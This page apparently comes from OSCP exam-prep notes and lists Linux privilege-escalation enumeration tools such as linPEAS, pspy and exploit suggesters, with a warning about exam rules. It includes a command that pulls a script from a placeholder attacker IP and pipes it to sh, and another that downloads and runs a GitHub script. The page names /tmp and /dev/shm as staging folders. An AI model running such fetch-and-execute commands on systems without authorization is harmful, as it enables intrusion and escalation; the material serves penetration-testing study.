search

Linux post exploitation scripts

I personally use linpeas (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) as it's well maintained and frequently updated for latest bugs and patches

hashtag
Words of wisdom

Be careful with what scripts you are executing as auto exploitation is totally restricted in exam and you are going to fail if you done this mistake , even without your intention so ALWAYS first check what you running before executing it , (Must give attention to 'auto-exploitation' word in scripts)

hashtag
Execution of script

wget http://<Attacker_IP>/<script_name> | sh | tee output.txt

# This will pull file from attacker box and execute it and also store output to txt file

hashtag
Common Location with writable permissions to download and execute scripts

/tmp
/dev/shm

hashtag
bangenum.sh (initial linux enumeration)

wget https://raw.githubusercontent.com/bngr/OSCP-Scripts/master/bangenum.sh
sed -i -e 's/\r$//' bangenum.sh
./bangenum.sh

hashtag
PSPY

What is running, any cron jobs any scripts? Use PSPY to find out

hashtag
linux-smart-enumeration

hashtag
SUID search

hashtag
xploit_installer.py (exploit suggester)

hashtag
Unix Priv checker

hashtag
linux-local-enum.sh

hashtag
linuxprivchecker.py

hashtag
linux-exploit-suggestor.sh

hashtag
unix-privesc-check.sh

hashtag
KernelPop

Automated kernel vulnerability enumeration and exploitation

PreviousLinux Manual ExploitationNextKernel Exploitation

Last updated